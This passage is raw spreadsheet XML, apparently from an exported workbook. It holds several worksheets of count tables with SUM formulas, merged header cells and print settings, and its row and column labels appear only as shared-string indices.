      <c r="E10" s="23"/>
      <c r="F10" s="23"/>
      <c r="G10" s="23"/>
      <c r="H10" s="23"/>
      <c r="I10" s="23"/>
      <c r="J10" s="82">
        <f>SUM(K10:Q10)</f>
        <v>0</v>
      </c>
      <c r="K10" s="23"/>
      <c r="L10" s="23"/>
      <c r="M10" s="23"/>
      <c r="N10" s="23"/>
      <c r="O10" s="23"/>
      <c r="P10" s="23"/>
      <c r="Q10" s="23"/>
    </row>
    <row r="11" spans="1:17" ht="15.75" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B11" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C11" s="23"/>
      <c r="D11" s="23"/>
      <c r="E11" s="23"/>
      <c r="F11" s="23"/>
      <c r="G11" s="23"/>
      <c r="H11" s="23"/>
      <c r="I11" s="23"/>
      <c r="J11" s="82">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K11" s="23"/>
      <c r="L11" s="23"/>
      <c r="M11" s="23"/>
      <c r="N11" s="23"/>
      <c r="O11" s="23"/>
      <c r="P11" s="23"/>
      <c r="Q11" s="23"/>
    </row>
    <row r="12" spans="1:17" ht="15.75" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B12" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C12" s="23"/>
      <c r="D12" s="23"/>
      <c r="E12" s="23"/>
      <c r="F12" s="23"/>
      <c r="G12" s="23"/>
      <c r="H12" s="23"/>
      <c r="I12" s="23"/>
      <c r="J12" s="82">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K12" s="23"/>
      <c r="L12" s="23"/>
      <c r="M12" s="23"/>
      <c r="N12" s="23"/>
      <c r="O12" s="23"/>
      <c r="P12" s="23"/>
      <c r="Q12" s="23"/>
    </row>
    <row r="13" spans="1:17" ht="15.75" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B13" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C13" s="23"/>
      <c r="D13" s="23"/>
      <c r="E13" s="23"/>
      <c r="F13" s="23"/>
      <c r="G13" s="23"/>
      <c r="H13" s="23"/>
      <c r="I13" s="23"/>
      <c r="J13" s="82">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K13" s="23"/>
      <c r="L13" s="23"/>
      <c r="M13" s="23"/>
      <c r="N13" s="23"/>
      <c r="O13" s="23"/>
      <c r="P13" s="23"/>
      <c r="Q13" s="23"/>
    </row>
    <row r="14" spans="1:17" ht="15.75" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B14" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C14" s="23"/>
      <c r="D14" s="23"/>
      <c r="E14" s="23"/>
      <c r="F14" s="23"/>
      <c r="G14" s="23"/>
      <c r="H14" s="23"/>
      <c r="I14" s="23"/>
      <c r="J14" s="82">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K14" s="23"/>
      <c r="L14" s="23"/>
      <c r="M14" s="23"/>
      <c r="N14" s="23"/>
      <c r="O14" s="23"/>
      <c r="P14" s="23"/>
      <c r="Q14" s="23"/>
    </row>
    <row r="15" spans="1:17" ht="15.75" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B15" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C15" s="23"/>
      <c r="D15" s="23"/>
      <c r="E15" s="23"/>
      <c r="F15" s="23"/>
      <c r="G15" s="23"/>
      <c r="H15" s="23"/>
      <c r="I15" s="23"/>
      <c r="J15" s="82">
        <f>SUM(K15:Q15)</f>
        <v>0</v>
      </c>
      <c r="K15" s="23"/>
      <c r="L15" s="23"/>
      <c r="M15" s="23"/>
      <c r="N15" s="23"/>
      <c r="O15" s="23"/>
      <c r="P15" s="23"/>
      <c r="Q15" s="23"/>
    </row>
    <row r="16" spans="1:17" ht="15.75" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B16" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C16" s="23"/>
      <c r="D16" s="23"/>
      <c r="E16" s="23"/>
      <c r="F16" s="23"/>
      <c r="G16" s="23"/>
      <c r="H16" s="23"/>
      <c r="I16" s="23"/>
      <c r="J16" s="82">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K16" s="23"/>
      <c r="L16" s="23"/>
      <c r="M16" s="23"/>
      <c r="N16" s="23"/>
      <c r="O16" s="23"/>
      <c r="P16" s="23"/>
      <c r="Q16" s="23"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="4">
    <mergeCell ref="A3:A4"/>
    <mergeCell ref="B3:I3"/>
    <mergeCell ref="J3:Q3"/>
    <mergeCell ref="A1:F1"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="1.141732283464567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pane ySplit="5" topLeftCell="A6" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="M8" sqref="M8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="6.375" style="0" customWidth="1"/>
    <col min="2" max="10" width="6.50390625" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:16" ht="14.25">
      <c r="A1" s="135" t="s">
        <v>397</v>
      </c>
      <c r="B1" s="78"/>
      <c r="C1" s="78"/>
      <c r="D1" s="78"/>
      <c r="E1" s="78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 t="s">
        <v>327</v>
      </c>
      <c r="P2" s="15"/>
    </row>
    <row r="3" spans="1:16" ht="19.5" customHeight="1">
      <c r="A3" s="178" t="s">
        <v>182</v>
      </c>
      <c r="B3" s="168" t="s">
        <v>220</v>
      </c>
      <c r="C3" s="168"/>
      <c r="D3" s="168"/>
      <c r="E3" s="168"/>
      <c r="F3" s="168"/>
      <c r="G3" s="168"/>
      <c r="H3" s="168"/>
      <c r="I3" s="168"/>
      <c r="J3" s="168"/>
      <c r="K3" s="168" t="s">
        <v>221</v>
      </c>
      <c r="L3" s="168"/>
      <c r="M3" s="168"/>
      <c r="N3" s="168"/>
      <c r="O3" s="168"/>
      <c r="P3" s="168"/>
    </row>
    <row r="4" spans="1:16" ht="19.5" customHeight="1">
      <c r="A4" s="178"/>
      <c r="B4" s="168" t="s">
        <v>222</v>
      </c>
      <c r="C4" s="168"/>
      <c r="D4" s="168"/>
      <c r="E4" s="168" t="s">
        <v>223</v>
      </c>
      <c r="F4" s="168"/>
      <c r="G4" s="168"/>
      <c r="H4" s="165" t="s">
        <v>224</v>
      </c>
      <c r="I4" s="166"/>
      <c r="J4" s="167"/>
      <c r="K4" s="168" t="s">
        <v>225</v>
      </c>
      <c r="L4" s="165" t="s">
        <v>226</v>
      </c>
      <c r="M4" s="166"/>
      <c r="N4" s="167"/>
      <c r="O4" s="168" t="s">
        <v>227</v>
      </c>
      <c r="P4" s="168" t="s">
        <v>228</v>
      </c>
    </row>
    <row r="5" spans="1:16" ht="19.5" customHeight="1">
      <c r="A5" s="178"/>
      <c r="B5" s="50" t="s">
        <v>222</v>
      </c>
      <c r="C5" s="50" t="s">
        <v>229</v>
      </c>
      <c r="D5" s="50" t="s">
        <v>230</v>
      </c>
      <c r="E5" s="50" t="s">
        <v>222</v>
      </c>
      <c r="F5" s="50" t="s">
        <v>229</v>
      </c>
      <c r="G5" s="50" t="s">
        <v>230</v>
      </c>
      <c r="H5" s="50" t="s">
        <v>222</v>
      </c>
      <c r="I5" s="50" t="s">
        <v>229</v>
      </c>
      <c r="J5" s="50" t="s">
        <v>230</v>
      </c>
      <c r="K5" s="168"/>
      <c r="L5" s="50" t="s">
        <v>231</v>
      </c>
      <c r="M5" s="50" t="s">
        <v>232</v>
      </c>
      <c r="N5" s="50" t="s">
        <v>222</v>
      </c>
      <c r="O5" s="168"/>
      <c r="P5" s="168"/>
    </row>
    <row r="6" spans="1:16" ht="15.75" customHeight="1">
      <c r="A6" s="56" t="s">
        <v>10</v>
      </c>
      <c r="B6" s="53">
        <f aca="true" t="shared" si="0" ref="B6:J6">SUM(B7:B17)</f>
        <v>4</v>
      </c>
      <c r="C6" s="53">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="D6" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E6" s="53">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="F6" s="53">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="G6" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="H6" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="I6" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J6" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="K6" s="53">
        <f>SUM(N6:O6:P6)</f>
        <v>4</v>
      </c>
      <c r="L6" s="53">
        <f>SUM(L7:L17)</f>
        <v>0</v>
      </c>
      <c r="M6" s="53">
        <f>SUM(M7:M17)</f>
        <v>4</v>
      </c>
      <c r="N6" s="53">
        <f>SUM(N7:N17)</f>
        <v>4</v>
      </c>
      <c r="O6" s="53">
        <f>SUM(O7:O17)</f>
        <v>0</v>
      </c>
      <c r="P6" s="53">
        <f>SUM(P7:P17)</f>
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:16" ht="15.75" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B7" s="114">
        <f>SUM(C7:D7)</f>
        <v>4</v>
      </c>
      <c r="C7" s="114">
        <f>SUM(F7,I7)</f>
        <v>4</v>
      </c>
      <c r="D7" s="114">
        <f>SUM(G7,J7)</f>
        <v>0</v>
      </c>
      <c r="E7" s="113">
        <f>SUM(F7:G7)</f>
        <v>4</v>
      </c>
      <c r="F7" s="23">
        <v>4</v>
      </c>
      <c r="G7" s="23"/>
      <c r="H7" s="113">
        <f>SUM(I7:J7)</f>
        <v>0</v>
      </c>
      <c r="I7" s="23"/>
      <c r="J7" s="23"/>
      <c r="K7" s="114">
        <f>SUM(N7:O7:P7)</f>
        <v>4</v>
      </c>
      <c r="L7" s="23"/>
      <c r="M7" s="23">
        <v>4</v>
      </c>
      <c r="N7" s="113">
        <f>SUM(L7:M7)</f>
        <v>4</v>
      </c>
      <c r="O7" s="23"/>
      <c r="P7" s="23"/>
    </row>
    <row r="8" spans="1:16" ht="15.75" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B8" s="114">
        <f aca="true" t="shared" si="1" ref="B8:B17">SUM(C8:D8)</f>
        <v>0</v>
      </c>
      <c r="C8" s="114">
        <f aca="true" t="shared" si="2" ref="C8:C17">SUM(F8,I8)</f>
        <v>0</v>
      </c>
      <c r="D8" s="114">
        <f aca="true" t="shared" si="3" ref="D8:D17">SUM(G8,J8)</f>
        <v>0</v>
      </c>
      <c r="E8" s="113">
        <f aca="true" t="shared" si="4" ref="E8:E17">SUM(F8:G8)</f>
        <v>0</v>
      </c>
      <c r="F8" s="23"/>
      <c r="G8" s="23"/>
      <c r="H8" s="113">
        <f aca="true" t="shared" si="5" ref="H8:H17">SUM(I8:J8)</f>
        <v>0</v>
      </c>
      <c r="I8" s="23"/>
      <c r="J8" s="23"/>
      <c r="K8" s="114">
        <f>SUM(N8:O8:P8)</f>
        <v>0</v>
      </c>
      <c r="L8" s="23"/>
      <c r="M8" s="23"/>
      <c r="N8" s="113">
        <f aca="true" t="shared" si="6" ref="N8:N17">SUM(L8:M8)</f>
        <v>0</v>
      </c>
      <c r="O8" s="23"/>
      <c r="P8" s="23"/>
    </row>
    <row r="9" spans="1:16" ht="15.75" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B9" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C9" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D9" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E9" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F9" s="23"/>
      <c r="G9" s="23"/>
      <c r="H9" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I9" s="23"/>
      <c r="J9" s="23"/>
      <c r="K9" s="114">
        <f>SUM(N9:O9:P9)</f>
        <v>0</v>
      </c>
      <c r="L9" s="23"/>
      <c r="M9" s="23"/>
      <c r="N9" s="113">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="O9" s="23"/>
      <c r="P9" s="23"/>
    </row>
    <row r="10" spans="1:16" ht="15.75" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B10" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C10" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D10" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E10" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F10" s="23"/>
      <c r="G10" s="23"/>
      <c r="H10" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I10" s="23"/>
      <c r="J10" s="23"/>
      <c r="K10" s="114">
        <f>SUM(N10:O10:P10)</f>
        <v>0</v>
      </c>
      <c r="L10" s="23"/>
      <c r="M10" s="23"/>
      <c r="N10" s="113">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="O10" s="23"/>
      <c r="P10" s="23"/>
    </row>
    <row r="11" spans="1:16" ht="15.75" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B11" s="114">
        <f>SUM(C11:D11)</f>
        <v>0</v>
      </c>
      <c r="C11" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D11" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E11" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F11" s="23"/>
      <c r="G11" s="23"/>
      <c r="H11" s="113">
        <f>SUM(I11:J11)</f>
        <v>0</v>
      </c>
      <c r="I11" s="23"/>
      <c r="J11" s="23"/>
      <c r="K11" s="114">
        <f>SUM(N11:O11:P11)</f>
        <v>0</v>
      </c>
      <c r="L11" s="23"/>
      <c r="M11" s="23"/>
      <c r="N11" s="113">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="O11" s="23"/>
      <c r="P11" s="23"/>
    </row>
    <row r="12" spans="1:16" ht="15.75" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B12" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C12" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D12" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E12" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F12" s="23"/>
      <c r="G12" s="23"/>
      <c r="H12" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I12" s="23"/>
      <c r="J12" s="23"/>
      <c r="K12" s="114">
        <f>SUM(N12:O12:P12)</f>
        <v>0</v>
      </c>
      <c r="L12" s="23"/>
      <c r="M12" s="23"/>
      <c r="N12" s="113">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="O12" s="23"/>
      <c r="P12" s="23"/>
    </row>
    <row r="13" spans="1:16" ht="15.75" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B13" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C13" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D13" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E13" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F13" s="23"/>
      <c r="G13" s="23"/>
      <c r="H13" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I13" s="23"/>
      <c r="J13" s="23"/>
      <c r="K13" s="114">
        <f>SUM(N13:O13:P13)</f>
        <v>0</v>
      </c>
      <c r="L13" s="23"/>
      <c r="M13" s="23"/>
      <c r="N13" s="113">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="O13" s="23"/>
      <c r="P13" s="23"/>
    </row>
    <row r="14" spans="1:16" ht="15.75" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B14" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C14" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D14" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E14" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F14" s="23"/>
      <c r="G14" s="23"/>
      <c r="H14" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I14" s="23"/>
      <c r="J14" s="23"/>
      <c r="K14" s="114">
        <f>SUM(N14:O14:P14)</f>
        <v>0</v>
      </c>
      <c r="L14" s="23"/>
      <c r="M14" s="23"/>
      <c r="N14" s="113">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="O14" s="23"/>
      <c r="P14" s="23"/>
    </row>
    <row r="15" spans="1:16" ht="15.75" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B15" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C15" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D15" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E15" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F15" s="23"/>
      <c r="G15" s="23"/>
      <c r="H15" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I15" s="23"/>
      <c r="J15" s="23"/>
      <c r="K15" s="114">
        <f>SUM(N15:O15:P15)</f>
        <v>0</v>
      </c>
      <c r="L15" s="23"/>
      <c r="M15" s="23"/>
      <c r="N15" s="113">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="O15" s="23"/>
      <c r="P15" s="23"/>
    </row>
    <row r="16" spans="1:16" ht="15.75" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B16" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C16" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D16" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E16" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F16" s="23"/>
      <c r="G16" s="23"/>
      <c r="H16" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I16" s="23"/>
      <c r="J16" s="23"/>
      <c r="K16" s="114">
        <f>SUM(N16:O16:P16)</f>
        <v>0</v>
      </c>
      <c r="L16" s="23"/>
      <c r="M16" s="23"/>
      <c r="N16" s="113">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="O16" s="23"/>
      <c r="P16" s="23"/>
    </row>
    <row r="17" spans="1:16" ht="15.75" customHeight="1">
      <c r="A17" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B17" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C17" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D17" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E17" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F17" s="23"/>
      <c r="G17" s="23"/>
      <c r="H17" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I17" s="23"/>
      <c r="J17" s="23"/>
      <c r="K17" s="114">
        <f>SUM(N17:O17:P17)</f>
        <v>0</v>
      </c>
      <c r="L17" s="23"/>
      <c r="M17" s="23"/>
      <c r="N17" s="113">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="O17" s="23"/>
      <c r="P17" s="23"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="10">
    <mergeCell ref="A3:A5"/>
    <mergeCell ref="H4:J4"/>
    <mergeCell ref="K4:K5"/>
    <mergeCell ref="O4:O5"/>
    <mergeCell ref="P4:P5"/>
    <mergeCell ref="K3:P3"/>
    <mergeCell ref="L4:N4"/>
    <mergeCell ref="B3:J3"/>
    <mergeCell ref="B4:D4"/>
    <mergeCell ref="E4:G4"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.9448818897637796" right="0.35433070866141736" top="0.5511811023622047" bottom="0.5511811023622047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5"/>
  <sheetViews>
    <sheetView zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <pane ySplit="4" topLeftCell="A5" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="B4" sqref="B4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="7.50390625" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12" ht="14.25">
      <c r="A1" t="s">
        <v>398</v>
      </c>
      <c r="B1" s="78"/>
      <c r="C1" s="78"/>
      <c r="D1" s="78"/>
      <c r="E1" s="15"/>
      <c r="F1" s="15"/>
      <c r="G1" s="15"/>
      <c r="H1" s="15"/>
      <c r="I1" s="15"/>
      <c r="J1" s="15"/>
      <c r="K1" s="15"/>
      <c r="L1" s="15"/>
    </row>
    <row r="2" spans="1:12" ht="14.25">
      <c r="A2" s="15"/>
      <c r="B2" s="15"/>
      <c r="C2" s="15"/>
      <c r="D2" s="15"/>
      <c r="E2" s="15"/>
      <c r="F2" s="15"/>
      <c r="G2" s="15"/>
      <c r="H2" s="15"/>
      <c r="I2" s="15"/>
      <c r="K2" s="15" t="s">
        <v>326</v>
      </c>
      <c r="L2" s="15"/>
    </row>
    <row r="3" spans="1:12" ht="21" customHeight="1">
      <c r="A3" s="49" t="s">
        <v>182</v>
      </c>
      <c r="B3" s="50" t="s">
        <v>0</v>
      </c>
      <c r="C3" s="50" t="s">
        <v>233</v>
      </c>
      <c r="D3" s="51" t="s">
        <v>213</v>
      </c>
      <c r="E3" s="51" t="s">
        <v>58</v>
      </c>
      <c r="F3" s="51" t="s">
        <v>49</v>
      </c>
      <c r="G3" s="50" t="s">
        <v>234</v>
      </c>
      <c r="H3" s="50" t="s">
        <v>52</v>
      </c>
      <c r="I3" s="50" t="s">
        <v>235</v>
      </c>
      <c r="J3" s="50" t="s">
        <v>236</v>
      </c>
      <c r="K3" s="50" t="s">
        <v>237</v>
      </c>
      <c r="L3" s="50" t="s">
        <v>238</v>
      </c>
    </row>
    <row r="4" spans="1:12" ht="18" customHeight="1">
      <c r="A4" s="56" t="s">
        <v>10</v>
      </c>
      <c r="B4" s="53">
        <f aca="true" t="shared" si="0" ref="B4:L4">SUM(B5:B15)</f>
        <v>79</v>
      </c>
      <c r="C4" s="53">
        <f t="shared" si="0"/>
        <v>13</v>
      </c>
      <c r="D4" s="53">
        <f t="shared" si="0"/>
        <v>19</v>
      </c>
      <c r="E4" s="53">
        <f t="shared" si="0"/>
        <v>18</v>
      </c>
      <c r="F4" s="53">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="G4" s="53">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="H4" s="53">
        <f t="shared" si="0"/>
        <v>7</v>
      </c>
      <c r="I4" s="53">
        <f t="shared" si="0"/>
        <v>6</v>
      </c>
      <c r="J4" s="53">
        <f t="shared" si="0"/>
        <v>7</v>
      </c>
      <c r="K4" s="53">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="L4" s="53">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:12" ht="18" customHeight="1">
      <c r="A5" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B5" s="113">
        <f>SUM(C5:L5)</f>
        <v>8</v>
      </c>
      <c r="C5" s="23"/>
      <c r="D5" s="23">
        <v>1</v>
      </c>
      <c r="E5" s="23">
        <v>1</v>
      </c>
      <c r="F5" s="23">
        <v>0</v>
      </c>
      <c r="G5" s="23">
        <v>0</v>
      </c>
      <c r="H5" s="23">
        <v>1</v>
      </c>
      <c r="I5" s="23">
        <v>3</v>
      </c>
      <c r="J5" s="23">
        <v>1</v>
      </c>
      <c r="K5" s="23"/>
      <c r="L5" s="23">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:12" ht="18" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B6" s="113">
        <f aca="true" t="shared" si="1" ref="B6:B15">SUM(C6:L6)</f>
        <v>5</v>
      </c>
      <c r="C6" s="23"/>
      <c r="D6" s="23">
        <v>1</v>
      </c>
      <c r="E6" s="23">
        <v>1</v>
      </c>
      <c r="F6" s="23"/>
      <c r="G6" s="23">
        <v>2</v>
      </c>
      <c r="H6" s="23">
        <v>1</v>
      </c>
      <c r="I6" s="23"/>
      <c r="J6" s="23"/>
      <c r="K6" s="23"/>
      <c r="L6" s="23"/>
    </row>
    <row r="7" spans="1:12" ht="18" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B7" s="113">
        <f t="shared" si="1"/>
        <v>10</v>
      </c>
      <c r="C7" s="23">
        <v>5</v>
      </c>
      <c r="D7" s="23">
        <v>2</v>
      </c>
      <c r="E7" s="23">
        <v>1</v>
      </c>
      <c r="F7" s="23">
        <v>0</v>
      </c>
      <c r="G7" s="23">
        <v>0</v>
      </c>
      <c r="H7" s="23">
        <v>0</v>
      </c>
      <c r="I7" s="23">
        <v>1</v>
      </c>
      <c r="J7" s="23">
        <v>1</v>
      </c>
      <c r="K7" s="23">
        <v>0</v>
      </c>
      <c r="L7" s="23">
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:12" ht="18" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B8" s="113">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="C8" s="23">
        <v>1</v>
      </c>
      <c r="D8" s="23">
        <v>2</v>
      </c>
      <c r="E8" s="23">
        <v>2</v>
      </c>
      <c r="F8" s="23">
        <v>1</v>
      </c>
      <c r="G8" s="23"/>
      <c r="H8" s="23"/>
      <c r="I8" s="23"/>
      <c r="J8" s="23"/>
      <c r="K8" s="23"/>
      <c r="L8" s="23"/>
    </row>
    <row r="9" spans="1:12" ht="18" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B9" s="113">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="C9" s="23"/>
      <c r="D9" s="23"/>
      <c r="E9" s="23"/>
      <c r="F9" s="23"/>
      <c r="G9" s="23"/>
      <c r="H9" s="23"/>
      <c r="I9" s="23"/>
      <c r="J9" s="23">
        <v>1</v>
      </c>
      <c r="K9" s="23"/>
      <c r="L9" s="23"/>
    </row>
    <row r="10" spans="1:12" ht="18" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B10" s="113">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="C10" s="23">
        <v>1</v>
      </c>
      <c r="D10" s="23">
        <v>1</v>
      </c>
      <c r="E10" s="23">
        <v>2</v>
      </c>
      <c r="F10" s="23">
        <v>1</v>
      </c>
      <c r="G10" s="23"/>
      <c r="H10" s="23"/>
      <c r="I10" s="23">
        <v>1</v>
      </c>
      <c r="J10" s="23"/>
      <c r="K10" s="23"/>
      <c r="L10" s="23"/>
    </row>
    <row r="11" spans="1:12" ht="18" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B11" s="113">
        <f t="shared" si="1"/>
        <v>13</v>
      </c>
      <c r="C11" s="23">
        <v>2</v>
      </c>
      <c r="D11" s="23">
        <v>4</v>
      </c>
      <c r="E11" s="23">
        <v>4</v>
      </c>
      <c r="F11" s="23"/>
      <c r="G11" s="23">
        <v>1</v>
      </c>
      <c r="H11" s="23">
        <v>1</v>
      </c>
      <c r="I11" s="23">
        <v>1</v>
      </c>
      <c r="J11" s="23"/>
      <c r="K11" s="23"/>
      <c r="L11" s="23"/>
    </row>
    <row r="12" spans="1:12" ht="18" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B12" s="113">
        <f t="shared" si="1"/>
        <v>10</v>
      </c>
      <c r="C12" s="23">
        <v>2</v>
      </c>
      <c r="D12" s="23">
        <v>4</v>
      </c>
      <c r="E12" s="23">
        <v>2</v>
      </c>
      <c r="F12" s="23">
        <v>1</v>
      </c>
      <c r="G12" s="23">
        <v>0</v>
      </c>
      <c r="H12" s="23">
        <v>0</v>
      </c>
      <c r="I12" s="23">
        <v>0</v>
      </c>
      <c r="J12" s="23">
        <v>0</v>
      </c>
      <c r="K12" s="23">
        <v>1</v>
      </c>
      <c r="L12" s="23">
        <v>0</v>
